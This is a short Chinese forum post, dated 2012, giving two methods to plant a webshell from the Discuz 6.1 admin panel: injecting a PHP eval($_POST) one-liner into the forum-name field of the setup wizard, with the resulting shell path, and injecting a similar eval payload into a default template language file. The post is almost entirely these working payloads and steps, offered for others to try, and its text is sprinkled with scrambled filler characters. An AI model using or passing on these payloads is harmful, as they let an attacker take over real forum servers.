discuz6.1两种方法后台拿shell- a' g' f4 S' ?& F3 c
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
6 X' V ?1 r; F- U1 T" ~1:
% u& }, G) u" Y9 ~. U8 Ohttp://127.0.0.1/discuz/admincp. ... zard&frames=yes' Z2 z9 u: N L! M0 ?" V' g
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell) q8 Q# @ T! h- H( M
<?php eval($_POST[cmd]);?>
1 D3 i0 v, N: W' K后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php! x* ^- Q$ I) [
# `( J( g3 [) \/ Z6 D( e, t% j# R' {- v) j
2:后台模板管理--默认模板套系--详情4 c9 M/ }: Y% @0 Z" E7 y+ |
templates/default/actions.lang.php5 |/ } d v7 Y* `. I
jhackj\\');eval($_POST[cmd])?>;//
5 u; ^ k" i2 d- Z6 U6 ]
8 E. T8 W- J# ^% W) z! l利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对